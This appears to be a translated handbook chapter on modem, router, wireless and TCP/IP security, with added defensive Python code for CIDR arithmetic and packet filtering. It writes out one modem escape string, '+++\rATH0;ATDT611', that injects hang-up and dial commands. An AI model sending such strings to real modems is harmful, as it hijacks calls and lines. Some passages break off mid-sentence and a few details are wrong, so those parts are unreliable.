Unfortunately, modem telephone numbers cannot be kept absolutely secret, because there are always people who have to call them. Moreover, even if you guard these numbers closely, attackers can still find your modem numbers by dialing every number in your area. For this reason secrecy alone is not an adequate answer to this risk, and modems need stronger protection.
Banners
A banner is a message that is displayed by a modem (or by the computer to which the modem is attached) when the modem is called. Some banners are displayed before the caller types anything; others are displayed once the caller has successfully authenticated.
Banners show callers that they have reached the system they intended and so improve the usability of the system, and they can also carry any warnings or legal notices. On the other hand, banners can also make an attacker's work easier, because attackers who scan all the telephone numbers in an area or city can tell from the banner which organization's modem they have found. So avoid putting in the banner the name of the organization, its telephone numbers, other contact information, or any information about the operating system your organization's computer uses. You should also avoid any words that convey a "welcome", because they may be construed legally as an invitation to unauthorized users. Below are some suggestions for what a banner should contain:
• State that any unlawful use of the system is prohibited and may be prosecuted. (Do not state that unlawful use will definitely be prosecuted. If some unauthorized users are prosecuted and others are not, those who are prosecuted can complain that the policy has been enforced against them selectively.)
• State that all users of the system may be monitored.
• Tell users that by using the system they are in fact consenting to being monitored, and that this is a condition of using the system.
• In some circumstances it is better to display no welcome banner at all.
Security schemes
With today's telephone systems, if you connect your computer's modem to an outside telephone line, anyone in the world can call it. Although usernames and passwords provide a degree of security, they are not foolproof. Users often choose weak passwords, and even good passwords can sometimes be discovered or guessed with special tools. For this reason, special kinds of modems and ways of using them have been developed that give computers more protection against unauthorized access.
way identifies himself, and the system then drops the connection and calls that person back at a predetermined number. This approach can increase security, because the system will call only numbers that have been approved in advance, and so attackers cannot make the system connect to their own modem. The number of telephone numbers that most modems of this kind can store is usually limited.
To work correctly, callback systems must disconnect the incoming call completely before placing any call; surprisingly, this can be very difficult on some telephone lines, and so it is better to use a different set of modems for the calls placed by the organization than for incoming calls.
Subversion is still possible in a callback system that uses two different sets of modems. If the attacker has tampered with the telephone company's switch, he can install call forwarding on the numbers that the modem is programmed to call and redirect the callbacks to his own modem. Callbacks can strengthen the overall security of a system, but they should not be relied on as the primary means of security.
Encrypting modems
These modems, which must be used in pairs, encrypt all information sent and received over the telephone line. Encrypting modems provide a high degree of security, not only against people attempting unauthorized access but also against wiretapping of the line itself. Some encrypting modems contain a preset encryption key that works only when paired with one particular other modem. Others have keys that can be changed according to a set routine in order to raise the level of security. All that said, many of the benefits of encrypting modems can be obtained at lower cost by using cryptographic protocols, such as SSH over a PPP connection, together with standard modems.
Caller ID
In many areas you can subscribe to an additional telephone service called Caller ID. As its name suggests, this service identifies the telephone number of the caller. Usually the number is shown on a small display beside the telephone when the phone starts to ring. Many modems can use this number directly and, if they are properly configured and programmed, can pass the caller's number to the host computer as soon as they receive it.
There are several ways of integrating Caller ID with remote access services:
• Some remote access systems can be configured to receive Caller ID information directly and to log it alongside the time of the call and the username supplied. Most remote access systems that can work with telephone lines delivered over ordinary ISDN, ISDN PRI, and T1 Flex-Path circuits are able to record Caller ID information in RADIUS files.
• After an attack, Caller ID can be very useful for tracing the attackers. Unlike a username and password, which may be stolen and used by an unauthorized person, Caller ID information in the overwhelming majority of cases identifies the real source of the attack.
• If your remote access system has no Caller ID capability, you can install a second modem on the same line in parallel with the first, program your computer to answer on the first modem on the third or fourth ring, and use a third-party program and the second modem to record the Caller ID. In this case you will have to merge the two log files yourself, either manually or with a special tool.
• ISDN and a few other telephone systems also offer a feature called restricted calling groups. This feature lets you specify a list of telephone numbers that are allowed to call the modem; once it is enabled, all other callers are blocked.
Advanced telephone services like these can only be as secure as the underlying telephone network. Many corporate telephone systems allow subscribers to set for themselves the Caller ID information that is displayed on the telephone; attackers who gain control of a company's telephone system can therefore program it to display any number they choose, and in that case they can get past any security system that relies solely on Caller ID or restricted calling groups.
• Make sure that long-distance calls cannot be placed on telephone lines that are not meant to be used for them. Your ordinary telephone lines may not need long-distance capability at all.
• Make sure that telephone lines used only for incoming calls cannot be used to place calls outside the organization.
• Make sure that telephone lines used only for placing calls cannot receive any calls. "Call forwarding" is a feature that can be used for this purpose.
Ask your telephone company to disable third-party billing for your system
Without third-party billing, people cannot charge the cost of their calls to the telephone line of your modem.
Testing modems
After connecting a modem, you should thoroughly test its ability to place and receive calls. First make sure that the modem works correctly under normal conditions. Then make sure that the computer responds acceptably when something unexpected happens. For example, if the telephone connection is lost, the computer should kill all the processes associated with that connection and log the user out, rather than allowing the next caller to reach the previous user's shell. Most of these tests are meant to confirm that the modem's control signals are passed correctly to the computer (so that the computer always knows whether a call is in progress), and that the computer, given this information, behaves correctly.
Originate testing
If you have set up your modem to place calls, you need to verify that it behaves correctly both when calls are made and when they are dropped. To test the modem, you must call another computer that you already know behaves correctly. (Do not call the same computer that you are trying to place the call from; if something goes wrong, you will not be able to tell where the fault lies.)
Carry out the test as follows:
1. Using a terminal emulator program, try to call a remote computer. Each time the computer answers, you should receive a login prompt. At this point you should be able to log in to the remote computer and use it as if you were connected to it directly.
2. Drop the connection to the remote computer by pulling the telephone cord out of the modem that placed the call. The terminal program should notice that the connection has been lost.
3. Call the remote computer again and drop the connection by switching off the modem. Again the program should notice.
4. Call the remote computer again. This time exit the program while the telephone connection is still up. The modem should automatically hang up on the remote computer.
5. Call the remote computer one last time. This time drop the connection in software, by killing the terminal process on your computer (from another terminal, or with Task Manager on Windows systems). Again the modem should automatically hang up on the remote computer.
Other things that you can check when placing calls are as follows:
• Make sure that there is no way to enter the modem's programming mode by sending escape sequences. An escape sequence is a sequence of characters that lets you take control of the modem and reprogram it. For example, most modems that use the "AT" command set (designed by the modem maker Hayes) enter programming mode when they receive a three-second pause, three plus signs (the default escape character) in a row, and another three-second pause. If your modem answers "OK" to this input, it can be reprogrammed by an escape sequence. Many UNIX modem control programs disable the modem's escape sequence. If this has not been done, on some modems receiving the string "+++\rATH0;ATDT611" causes the modem to drop the current connection and dial "611", the international telephone repair number. (On some modems there must be a three-second pause between "+++" and "\r" and on others not, because the three-second interval was patented by Hayes and many modem manufacturers have decided
• Check whether the modem properly separates simultaneous access. Make sure that there is no way for users to get at a modem that is currently being used by another user.
If the terminal program does not exit after the telephone is hung up, or if the modem can be returned to programming mode by sending an escape sequence, a user may be able to place calls that are never logged. Such a user might even be able to reprogram the modem to call one particular telephone number regardless of the number it was supposed to dial. A Trojan horse might also then follow what your users do.
If the modem does not hang up after the program exits, it can run up very large telephone bills and, more importantly, the user who was using the remote computer may remain logged in there, in which case the next user may gain access to the previous user's account on the remote computer.
Answer testing
To test the computer's ability to answer calls, you need another computer or terminal with a second modem with which to call your computer.
Carry out the test as follows:
1. Call your computer. It should answer within the first few rings and display a login prompt. If your modem is set up to work at several baud rates, you may need to press a particular key (usually Break or Linefeed) several times to match the baud rate of the answering modem to that of the modem you are calling from. This is not necessary if you are using a modem that sets the baud rate automatically.
2. Log in to the computer as usual and then log out. The computer should then hang up the telephone.
3. Call your computer again and log in again, and this time drop the connection by pulling the telephone cord out of the calling modem. This simulates a sudden loss of the connection. Then call your computer back on the same number. You should receive a new login prompt, and you must under no circumstances be returned to your previous session or shell, because the process for that shell should have been killed as soon as the connection was lost. When the telephone connection drops, the system must log the user out automatically. Otherwise, if the telephone is hung up accidentally and someone else calls the computer, that person will be able to run commands as an authorized user without even logging in or entering a password.
4. If you have several modems connected as a modem group (in which the first modem that is not busy answers the call and all calls are made to a single number), make sure that the arrangement works properly. Many of these systems do not, with the result that callers hear a busy signal even when some of the modems are free. Some of these groups stop searching for a free modem when they reach a faulty one, so that the remaining modems in the group are never used.
Types of eavesdropping
In a telephone conversation carried over a modem there are essentially six points at which the call can be tapped. At your end, an attacker can place a tape recorder or another modem in parallel with the equipment you are using. A little further away, outside the window, it may be possible to determine the information being transferred by analyzing the flashing of the modem's transmit and receive data lights. Between your premises and the telephone company's central office, an extra branch may be taken off the wires. At the telephone company's switching center, a programmer can attach an untraceable transmitter to the computerized switch, or install a wire on the switch by hand. If the call is routed over satellite or microwave links, those radio signals can be decoded; and finally, a tapping device can be installed at the destination of the call.
Countering eavesdropping
There are various measures, of varying effectiveness, that you can use against electronic eavesdropping:
Using encryption
The best way to protect communications from eavesdropping is to assume that your communications equipment is always compromised and, as a preventive measure, to encrypt all of your information. If you use a dial-up connection to reach the Internet, you can use cryptographic protocols such as SSL and SSH to create an encrypted barrier that extends from your computer to the remote server. VPN systems such as the Point-to-Point Tunneling Protocol (PPTP) and IPSec can also be used to encrypt all communication between your computer and the remote server.
A few years ago, telephones and modems with encryption capability were available only to certain customers and cost more than a thousand dollars, but today there are devices costing less than 300 dollars that can be placed between the computer and the modem to create a secure, encrypted telephone link. Most of these systems are based on private-key cryptography and require the user of the system to send a separate key for each user. In practice, such restrictions are not a problem for most organizations. At the same time, there is a growing number of public-key systems that provide an effective level of security and are also simple to use. There are also reasonably priced modems that have built-in encryption functions and need no other special hardware in order to work.
Telephone Scanning
You can use a telephone scanner program to find unknown and unauthorized modems. A telephone scanner is a program that automatically calls every number in a predefined range and records the login banners of the systems that answer. Some telephone scanners can be programmed to try to break into the computer systems they find by using a predefined list of usernames and passwords. Telephone scanners are available both free and commercially, with differing capabilities. In addition, some computer consulting firms perform telephone scanning as part of a security audit.
In many cases the only way to identify rogue telephones is visual inspection of the physical wiring junction boxes and the other points where outside telephone lines can enter the organization; and in an environment full of authorized wireless devices, identifying unauthorized wireless devices is far more difficult than this.
Networks
Although telephone modems are still widely used to connect computers, millions of computers are connected to one another through faster networks. From a practical point of view, computer users today usually divide the world of networks into two categories:
One particular kind of wide area network that has seen growing use is the virtual private network (VPN). A VPN is a virtual network because its packets travel over the Internet (or another public network); and it is a private network because the data inside the packets is encrypted to prevent other users of the public network from learning the contents of the packets or tampering with them. A VPN can connect different sites at a cost far lower than that of leased telephone lines.
One of the first computer networks was ARPANET, which was created in the early 1970s by universities and companies under contract to the U.S. Department of Defense's Advanced Research Projects Agency (ARPA or DARPA). ARPANET connected computers around the world and served as a backbone [250] for many other local and university networks that came into being in the 1980s.
249 Broadcast
250 Backbone
Today the descendant of ARPANET is known as the Internet. The Internet is an IP-based network that encompasses hundreds of millions of computers and more than a billion users around the world. Some of these computer systems are always connected to the network, and the rest connect to it from time to time. Any of these users can try to send you an e-mail message, exchange files with your FTP server, or (if your system is configured in a way that gives them the necessary access) break into your system.
Routers and Gateways
Despite the complexity of the Internet and of IP-based addressing, computers can easily send messages to one another across the global network. To send a packet, most computers simply specify the packet's final destination and then send the packet to a computer on their local network called a "gateway". If this gateway itself determines the packet's next hop on the way to its final destination, it is called a "router". To get the packet to its final destination, the router sends it to a gateway that is directly connected to it and is believed to be one step closer to the final destination.
Many organizations configure their internal network as a large tree with the organization's Internet connection at its root. When a gateway receives a packet, it decides whether to send it to one of its own subnets or to forward it toward the root. Outside, on the Internet, the major IP providers have complex networks, advanced routing algorithms and specialized routing protocols, and many of them use overlapping networks so that if one link fails, the other links keep the connection up.
Home users and small offices can easily obtain 4-port or 8-port Ethernet routers that are designed to connect to a high-bandwidth DSL line or to a cable modem, and that route packets between the home computers and that high-speed connection and from there to the Internet. One of the most important features of these devices (and of devices supported by edge routers [251]) is network address translation (NAT) [252]. NAT is a general system for translating the IP addresses of packets received by the router into other addresses, before (or after) the router determines the packet's destination and forwards it there. It is generally used either to let several internal computers with private (and non-routable) IP addresses share a single external (public) IP address, or to translate the public IP addresses of groups of computers into corresponding private IP addresses on the internal network. Because internal IP addresses are not directly reachable from the Internet (since no other router can route them correctly), NAT can provide a kind of protection against connections that outside users open to internal machines, while the internal machines can still connect to the Internet.
The next feature of edge routers is their ability to set up a virtual private network (VPN) between two local networks at separate locations, for example two offices of one organization. A pair of routers can create a VPN by using protocols such as IPsec and by carrying packets securely between the local networks through something like a virtual tunnel rather than over the unprotected Internet.
Routers usually mark the boundaries of a network's security perimeter, and they can be a point of vulnerability. By tampering with a router, attackers can redirect packets that were sent to the organization to another place, or gain unauthorized access to internal hosts or to network topology information [253]. Each router manufacturer offers different programming features, which makes securing routers a difficult job. One practical recommendation is to make sure that routers can be programmed only with physical access (for example from a terminal connected to the router by a serial cable) and that their configuration cannot be changed remotely over the network. Router configuration options must always be protected by a password. If routers are to be managed through SNMP, read access to them must be protected by a password, and write access must be disabled.
Border routers must be equipped with egress filters [254] so that they do not send packets out of the network unless the packet's source IP address is valid and belongs to that network. These routers must also be equipped with ingress filters [255] so that forged packets that claim to have come from inside the network are not accepted on the router's external interface and are not forwarded inside.
• Block all incoming traffic apart from a few exceptions, such as allowing HTTP connections to port 80 for everyone, and SSH connections to port 22 for a list of predetermined hosts. This approach, known as "deny everything that is not permitted", is a security model whose use is usually recommended.
• Allow outgoing HTTP connections to any destination on the Internet, but permit inbound connections only from certain specific hosts.
• Log firewall events for later analysis.
Configure the monitor so that it requires several probes [265] before it blocks a remote host. A large number of such monitors, which scan to find points of attack, are available for various platforms, both free and commercial.
Wireless Networks
A very common and growing networking strategy, especially in places where building network infrastructure is costly or impossible, is wireless networking. Wireless networks generally follow the IEEE 802.11 standards, which include 802.11a, 802.11b and 802.11g. [266] In a typical wireless network, devices called wireless access points [267] are installed to receive and transmit data within a given area (for example, one floor of a building). These devices may be connected to one another, but for packets to be sent outside the organization they must ultimately be connected to the organization's routers.
There are many considerations in setting up a wireless network. Data on the network must remain confidential; that is, attackers must not be able to eavesdrop on this data, and beyond that they must not be able to join the wireless network and use its resources (such as the Internet connection).
Unfortunately, wireless networking does not have a good record where security is concerned. 802.11b networks in particular mostly offer very limited protection capabilities. Although a protocol called the Wired Equivalent Protocol (WEP) [268] is now widely used for link-level encryption, it has been shown that this protocol contains a fundamental flaw, and attackers with relatively simple hardware (a laptop and a wireless network card) can collect enough data to discover the encryption key and expose all of the data. The most widely used access control methods, such as MAC filtering (allowing only wireless clients with known hardware addresses to join and connect), are also weak, because a MAC address is easy to discover and to change. Although enabling all of these security features, together with changing the default SSIDs and turning off SSID broadcast, can help achieve a higher level of security, even using all of them together does not produce a secure wireless network.
In older 802.11b networks, confidentiality is obtained only by requiring clients to use end-to-end encryption for their connections (such as VPN systems or SSH), and access control can be managed with the captive portal method. In this system a firewall (which ideally operates at every access point) blocks all unauthenticated traffic except traffic going to the portal application, and this application is responsible for securely authenticating users and for notifying the firewall to give permission
265 Probe
266 Other wireless devices such as mobile phones and PDAs use GSM mobile telephone networks. Many of the problems of 802.11 also afflict GSM networks. For more information see the following book: "Mobile Risk Management: E-Finance in the Wireless Environment", 2002, written by Tom Kellermann for the World Bank: www.worldbank1.org/finance
267 Wireless Access Points
268 Wired Equivalent Protocol
269 Extensible Authentication Protocol
access authenticates the identity and changes the client's state to "authenticated", sends an initial WEP key for use in encrypting the wireless data, and can also change this key during the connection. Changing the keys from time to time prevents attacks that rely on capturing a large number of packets encrypted with the same WEP key.
Wi-Fi Protected Access (WPA) [270] is a newer standard that offers a better encryption system than WEP, together with authentication either through 802.1x or by means of a shared key. The shared-key mode is mainly intended for home users and small offices that are not able to deploy their own RADIUS servers to perform 802.1x authentication. Like wired networks, wireless networks can also benefit from correctly configured packet filters at the access points, from suitable placement of the access points in the network topology (ideally outside the internal firewall), and from other similar methods of strengthening network security. Setting up a network intrusion detection system on the wireless network is also a useful measure.
Finally, note that wireless networks are always exposed to interference [271]. For example, a microwave oven with a crack in its casing can disrupt the operation of a wireless network based on Wi-Fi (802.11) technology, because microwave systems and Wi-Fi both use the same part of the 2.4 GHz spectrum. Interference does not lead to disclosure of information, but it can nevertheless make the wireless network unusable in practice.
Two useful books on setting up secure wireless networks are "802.11 Security" and "RADIUS Security", both published by O'Reilly & Associates.
TCP/IP Networks
The Internet Protocol (IP) is the glue that holds modern computer networks together. IP specifies how messages are transferred from one computer to another, and in effect it defines a "common language" that all computers on the Internet use to talk to one another.
Version 4 of the Internet Protocol, IPv4, which has been used on the Internet since 1982, is in use throughout the world today and will very probably remain in use for many years to come. IPv5 was an experimental protocol that never found wide use, and IPv6 is the newest version of the Internet Protocol. IPv6 has advantages such as a very large address space and built-in encryption capability. Since 2003 IPv6 has been used heavily on an experimental basis, and its use is gradually becoming more widespread.
Data on the Internet is sent in blocks of characters called datagrams or, more colloquially, "packets". Each packet has a block of data consisting of a few bytes, called the "header", which identifies the sender and the final destination of the packet. The header is usually followed by a larger block of bytes called the packet's "contents". After packets reach their destination, they are often reassembled [272] into a continuous stream of data; this process of fragmenting data into packets and reassembling it is usually hidden from the user. Because there are usually many different routes from one system to another, each packet may take a different path from source to destination.
IP packets themselves can also be placed inside other packets that belong to other network protocols. For example, many IP networks that are built today with leased direct lines actually send IP packets encapsulated in Frame Relay or Asynchronous Transfer Mode (ATM) [273] networks.
IP Addressing
Every interface of every computer on an IPv4 network is assigned a unique 32-bit address. These addresses are usually written as four 8-bit numbers called octets. A sample address is 18.70.0.224. A computer can have several network interfaces, each with its own address, and each may be on a different local network from the others.
In theory, a 32-bit address allows at most 2^32 = 4,294,967,296 computers to be connected to the Internet at one time; in practice, however, the total number of computers that can be connected to the Internet is far greater than 2^32, because with technologies such as proxies and NAT a large number of computers can share one IP address. These multiple computers behind a single IP address can be configured to implement and enforce different policies for how computers connect to one another, including blocking all access, allowing limited access, or allowing unlimited access, in one or both directions of communication.
IP Networks
The Internet is a network of networks. Although many people think these networks are all as large as the networks of big companies such as AT&T, WorldCom and Sprint, most of the networks that make up the Internet are in fact local networks, such as the network inside an organization's office building or the network of a small research laboratory. Each of these small networks is assigned its own network number.
A network number can be looked at in two ways. "Classical" network numbers were identified by a few prefix bits in the address of each host on the network. This method divided the address space into well-defined sets of networks of different sizes. In classical addressing there are 5 main types of IP address; the first few bits of the address (the most significant bits) define the class of the network to which the address belongs, and the remaining bits are divided into a "network" part and a "host" part:
Many of these network classes had large holes, that is, sets of addresses that were never used. With the sudden growth in the number of Internet sites, a somewhat different interpretation of network addresses was proposed that allowed addresses to be assigned in smaller units and therefore wasted fewer of them. This method is called Classless Inter-Domain Routing (CIDR) [277]. As the name suggests, in this method there is no such thing as an address class; instead, the network number is defined by the k most significant bits of each address, and the remaining bits are used as the part of the address that identifies the host. A service provider can therefore be given a range of addresses in which the first 14 bits are a fixed value (the network address) and the remaining 18 bits represent the values available for assignment to hosts. This enables the service provider to allocate 2^18 distinct addresses to its customers.
CIDR networks are usually written as the lowest IP address in the range, a slash, and then the size of the network part in bits. For example, the network 128.200.0.0/14 represents all IP addresses from 128.200.0.0 to 128.203.255.255. Another way of writing this network is the lowest IP address in the range, a slash, and then the netmask [278]. For example, the network from the previous example is written in this form as 128.200.0.0/255.252.0.0.
CIDR is compatible with the classical addressing format: the network part of class A addresses consists of 8 bits (for example 10.0.0.0/8), that of class B of 16 bits (for example 192.168.0.0/16), and so on for the other address classes.
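The two notations above, and the egress and ingress filtering rule for border routers described earlier in this chapter, worked through in code. This is an added example, not part of the handbook; the function names are illustrative, and every sample address other than 128.200.0.0/14 and 18.70.0.224 is constructed.

```python
MASK32 = 0xFFFFFFFF


def ip_to_int(dotted):
    """Dotted-quad IPv4 text -> 32-bit integer (four 8-bit octets)."""
    octets = [int(part) for part in dotted.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {dotted!r}")
    value = 0
    for o in octets:
        value = (value << 8) | o
    return value


def int_to_ip(value):
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def prefix_to_mask(k):
    """Netmask: the k most significant bits are 1, the remaining bits are 0."""
    if not 0 <= k <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    return (MASK32 << (32 - k)) & MASK32


def mask_to_prefix(mask):
    """Inverse of prefix_to_mask; rejects masks whose 1 bits are not contiguous."""
    k = bin(mask).count("1")
    if prefix_to_mask(k) != mask:
        raise ValueError(f"non-contiguous netmask: {int_to_ip(mask)}")
    return k


def parse_network(text):
    """Accept 'a.b.c.d/k' or 'a.b.c.d/m.m.m.m'; return (network, mask) as integers."""
    base, slash, suffix = text.partition("/")
    if not slash:
        raise ValueError("expected address/prefix or address/netmask")
    mask = ip_to_int(suffix) if "." in suffix else prefix_to_mask(int(suffix))
    mask_to_prefix(mask)  # validates that the netmask is well formed
    network = ip_to_int(base)
    if network & ~mask & MASK32:
        raise ValueError("base address is not the lowest address of the range")
    return network, mask


def address_range(text):
    """Lowest address, highest address and number of addresses in the network."""
    network, mask = parse_network(text)
    last = network | (~mask & MASK32)
    return int_to_ip(network), int_to_ip(last), last - network + 1


def contains(network_text, address):
    network, mask = parse_network(network_text)
    return ip_to_int(address) & mask == network


def border_filter(direction, source_ip, internal_network):
    """Anti-spoofing decision of a border router, based on the source address only.

    egress : forward only packets whose source belongs to the internal network.
    ingress: drop packets arriving on the external interface that claim an
             internal source address.
    """
    inside = contains(internal_network, source_ip)
    if direction == "egress":
        return "forward" if inside else "drop"
    if direction == "ingress":
        return "drop" if inside else "forward"
    raise ValueError("direction must be 'egress' or 'ingress'")


if __name__ == "__main__":
    print(address_range("128.200.0.0/14"))
    print(int_to_ip(prefix_to_mask(14)))
    print(border_filter("ingress", "128.202.0.1", "128.200.0.0/14"))
```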
276 Bugs and incompatibilities among the various IP implementations have prevented the use of 0 or 255 as a valid IP address.
277 Classless Inter-Domain Routing
278 A number resembling an IP address in which the k most significant bits, which represent the network number, have the value 1 and the remaining bits have the value 0.
Packets and Protocols
Today there are four main types of IP packets that are sent over the Internet and seen by ordinary hosts, and each packet type belongs to a particular protocol. (Other types of packets may be used by routers on the main Internet backbones or by VPNs.)
ICMP [279]
Internet Control Message Protocol. This protocol is used for the low-level operations of IP, such as exchanging traffic and routing information, and it has many subtypes.
TCP [280]
Transmission Control Protocol. This protocol is used to create a two-way stream connection between two computers. It is connection-oriented, and it includes timeout [281] and retransmission [282] capabilities to guarantee reliable transfer of information.
UDP [283]
User Datagram Protocol. This protocol is used to send packets from one host to another. It is connectionless [284]. In theory it is not considered reliable and it has no particular mechanism for making sure a message is delivered, but under normal conditions most packets reach their destination.
IGMP [285]
Internet Group Management Protocol. This protocol is used to control multicast, which is the deliberate sending of one packet to more than one host. Multicast is the basis of the Internet's multimedia backbone, MBONE.
ICMP
Internet Control Message Protocol. This protocol is used to exchange messages between gateways and hosts for the low-level operations of the Internet. For example, the ping command uses ICMP echo [286] packets to test network connectivity. The response to an echo packet is usually either an ICMP echo reply or an ICMP message stating that the destination is unreachable.
In addition to the information in the IP header (the packet's source and destination addresses), every ICMP packet also has an ICMP header, which contains an 8-bit value that identifies the packet type. Some ICMP packet types are no longer used on the Internet, yet many of them are still used in various TCP/IP implementations. This has at times caused security problems. More precisely, packets of type 3 (destination unreachable), type 4 (source quench) and type 5 (redirect) carry security risks, because an attacker who can send ICMP packets of these types can redirect network traffic to a destination of his choosing or launch denial-of-service attacks. Although the other packet types do not carry much direct risk, different versions of different operating systems usually do not answer them in the same way, and attackers can use the pattern of responses to determine the type of operating system and then exploit its known bugs. If you use a firewall, you should block or monitor most ICMP packet types. Usually you can, without causing any side effects, block inbound ICMP packets of types 5, 13 (timestamp [287] request), 14 (timestamp reply), 17 (address mask request) and 18 (address mask reply), as well as outbound ICMP packets of types 5, 11 (time exceeded), 12 (parameter problem), 13, 14, 17 and 18.
TCP
TCP creates a reliable, ordered, two-way stream between two programs that are running on the same computer or on two different computers. "Reliable" means that every byte sent is guaranteed to reach its destination (and that if it does not, you are guaranteed to be told), and also that bytes are received at the destination in the same order in which they were sent. Obviously, if the connection is physically broken, the bytes that have not yet been transferred will not reach the destination unless an alternative route to that destination is found. In that case the TCP implementation must return an error to the sending or receiving process, rather than pretending that the connection is still working.
Each TCP connection is attached to a port at each of its two ends, and ports are identified by 16-bit numbers. In most TCP implementations, the server uses for each of its services the port number that has been assigned to that service, and the client's port number is chosen at random for each connection. Some well-known port numbers are port 80 for HTTP servers and port 25 for SMTP servers.
On the wire, TCP packets are IP packets to which a TCP header has been added. This header contains several other pieces of information, including:
• the TCP source port number of the packet,
• the TCP destination port number of the packet,
• sequence information, so that the receiver can put the contents of the packet in their correct position in the TCP stream,
• flow control information, which tells the receiver how many more bytes the sender of the packet is able to receive [288], and
• the TCP checksum [289].
At any moment, every IPv4 TCP connection on the Internet can be identified by two 32-bit numbers and two 16-bit numbers:
TCP uses two special bits in the packet header, called SYN and ACK, to send requests to create new connections. To open a TCP connection, the requesting host sends the receiving host a packet in which the SYN bit is 1 and the ACK bit is 0. The receiving host then acknowledges the request by sending back a packet in which both the SYN and ACK bits are 1; and finally the first host sends a third packet in which the ACK bit is 1 but the SYN bit is 0. This procedure is called the TCP three-way handshake [290]. By looking for packets whose header has the SYN bit set but the ACK bit not set, one can distinguish packets that request a new connection from packets that are sent in response to connections that have already been established. This distinction is useful when building packet-filtering firewalls.
287 Timestamp
288 This number is called the "TCP window".
289 Checksum
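A stateless packet filter that applies the SYN/ACK distinction described above together with the "deny everything that is not permitted" rule and the ICMP type lists given earlier in this chapter. This is an added example, not code from the handbook; the packet builders, the allowed SSH host and all sample addresses are constructed, and accepting any inbound segment that has ACK set is an assumption of the stateless design.

```python
import socket
import struct

SYN, ACK = 0x02, 0x10
PROTO_ICMP, PROTO_TCP = 1, 6

# ICMP type lists as given in the text.
INBOUND_ICMP_BLOCKED = {5, 13, 14, 17, 18}
OUTBOUND_ICMP_BLOCKED = {5, 11, 12, 13, 14, 17, 18}
# Hypothetical list of predetermined hosts allowed to open SSH connections.
SSH_ALLOWED_HOSTS = {"192.0.2.10"}


def parse_packet(raw):
    """Extract the fields the filter needs from a raw IPv4 packet."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (raw[0] & 0x0F) * 4              # IP header length in bytes
    if ihl < 20 or len(raw) < ihl:
        raise ValueError("bad IPv4 header length")
    pkt = {"proto": raw[9],
           "src": socket.inet_ntoa(raw[12:16]),
           "dst": socket.inet_ntoa(raw[16:20])}
    payload = raw[ihl:]
    if pkt["proto"] == PROTO_TCP:
        if len(payload) < 20:
            raise ValueError("truncated TCP header")
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", payload[:4])
        pkt["flags"] = payload[13]         # byte 13 of the TCP header holds the flag bits
    elif pkt["proto"] == PROTO_ICMP:
        if not payload:
            raise ValueError("truncated ICMP header")
        pkt["icmp_type"] = payload[0]      # the 8-bit ICMP type
    return pkt


def classify_tcp(flags):
    """Place a segment in the three-way handshake by its SYN and ACK bits."""
    if flags & SYN and not flags & ACK:
        return "new-connection"            # step 1: SYN=1, ACK=0
    if flags & SYN and flags & ACK:
        return "handshake-reply"           # step 2: SYN=1, ACK=1
    if flags & ACK:
        return "established"               # step 3 and all later data
    return "other"


def decide(raw, direction):
    """Return 'accept' or 'drop' for a packet travelling 'in' or 'out'."""
    pkt = parse_packet(raw)
    if pkt["proto"] == PROTO_ICMP:
        blocked = INBOUND_ICMP_BLOCKED if direction == "in" else OUTBOUND_ICMP_BLOCKED
        return "drop" if pkt["icmp_type"] in blocked else "accept"
    if pkt["proto"] != PROTO_TCP:
        return "drop"                      # default deny for everything else
    kind = classify_tcp(pkt["flags"])
    if direction == "out":
        # New outbound connections only to HTTP; replies of accepted sessions pass.
        return "accept" if kind != "new-connection" or pkt["dport"] == 80 else "drop"
    if kind == "new-connection":
        if pkt["dport"] == 80:
            return "accept"                # HTTP for everyone
        if pkt["dport"] == 22 and pkt["src"] in SSH_ALLOWED_HOSTS:
            return "accept"                # SSH for listed hosts only
        return "drop"
    # Stateless assumption: a segment with ACK set belongs to an existing connection.
    return "accept" if kind in ("handshake-reply", "established") else "drop"


def build_ipv4(proto, src, dst, payload):
    """Constructed test packet: 20-byte IPv4 header (checksum left at 0) plus payload."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                         proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return header + payload


def build_tcp(sport, dport, flags):
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)


def build_icmp(icmp_type):
    return struct.pack("!BBHI", icmp_type, 0, 0, 0)


if __name__ == "__main__":
    syn_telnet = build_ipv4(PROTO_TCP, "203.0.113.7", "198.51.100.5",
                            build_tcp(40000, 23, SYN))
    print(decide(syn_telnet, "in"))
```

A filter like this cannot tell whether an inbound ACK segment really belongs to a connection that was opened from inside; a stateful firewall that tracks handshakes closes that gap.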
TCP is used in most Internet services that need stable, synchronized transfer of a data stream in one or both directions. For example, TCP is used in the HTTP protocol, in remote terminal services, file transfer and electronic mail, and also for sending commands to displays that use the X-Windows system. Table 5-A lists the ports assigned to a number of common TCP services. Major security problems and exploitable weaknesses have been discovered in most of these services, and they are noted next to each one.
The security concerns of TCP services are classified as follows:
A. The service can be abused remotely to launch a denial-of-service attack;
B. The protocol requires the password to be transmitted over the Internet in plaintext, without any encryption (under IPv4);
C. Misconfiguration of SMTP servers, CGI scripts and proxies is one of the main causes of the relaying of unsolicited e-mail on the Internet; and
D. The service is usually configured to use IP addresses for authentication, and this is exposed to the threat of spoofing and other similar kinds of attacks.
UDP
UDP provides a simple, unreliable system for sending data between two or more programs on the same computer or on different computers. "Unreliable" means that the operating system does not guarantee that every packet sent will be delivered at the destination, or that packets will arrive in the order in which they were sent; nevertheless, UDP makes its best effort to deliver packets to their destination. Usually, on a local network or an uncongested path, UDP delivers close to 100% of packets. The advantage of UDP is its lower overhead [291] compared with TCP; this lower overhead allows UDP-based services to be up to 10 times as efficient as TCP at sending information. UDP is used primarily in Sun's Network Information System (NIS) and Network File System (NFS), for looking up host names, and for transferring routing information. UDP is also used in services that are not much harmed by the occasional loss of a packet, for example because they receive another related packet with similar information within a short time, or because the information is not very important.
291 Overhead
